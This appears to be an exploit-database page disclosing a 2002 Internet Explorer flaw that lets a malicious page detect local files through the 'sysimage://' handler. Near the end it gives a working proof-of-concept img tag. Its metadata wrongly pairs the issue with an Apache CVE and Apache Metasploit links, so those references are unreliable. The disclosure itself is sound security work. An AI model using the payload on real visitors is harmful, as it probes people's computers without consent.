header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Microsoft Internet Explorer File Detection
200
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.5
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: YES
Related CWE: CVE-2002-0392
CPE: a:microsoft:internet_explorer
Metasploit: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2002-0392/https://www.rapid7.com/db/vulnerabilities/http-apache2-chunked-transfer-int-bof/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-apache-chunked-encoding-vulnerability-cve-2002-0392/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Internet Explorer File Detection

Microsoft Internet Explorer is prone to a vulnerability that may allow a remote site to detect files on the local computer. A remote attacker can exploit this issue through the ''sysimage://' protocol handler to detect the existence of a file on the local computer of the Web client viewing a malicious page. This could lead to a disclosure of sensitive information to remote attackers.

Mitigation:

Users should avoid visiting untrusted websites and should exercise caution when clicking on links or opening attachments from unknown sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11834/info

Microsoft Internet Explorer is reported prone to a vulnerability that may allow a remote site to detect files on the local computer. 

A remote attacker can exploit this issue through the ''sysimage://' protocol handler to detect the existence of a file on the local computer of the Web client viewing a malicious page. This could lead to a disclosure of sensitive information to remote attackers.

<img src="sysimage://C:\WINNT\Notepad.exe,666"
onLoad="document.write('<b>Cannot Find File!</b>');"
onError="document.write('<b>File Exists!</b>');">

Navigation

Suggest Exploit

Services By CQR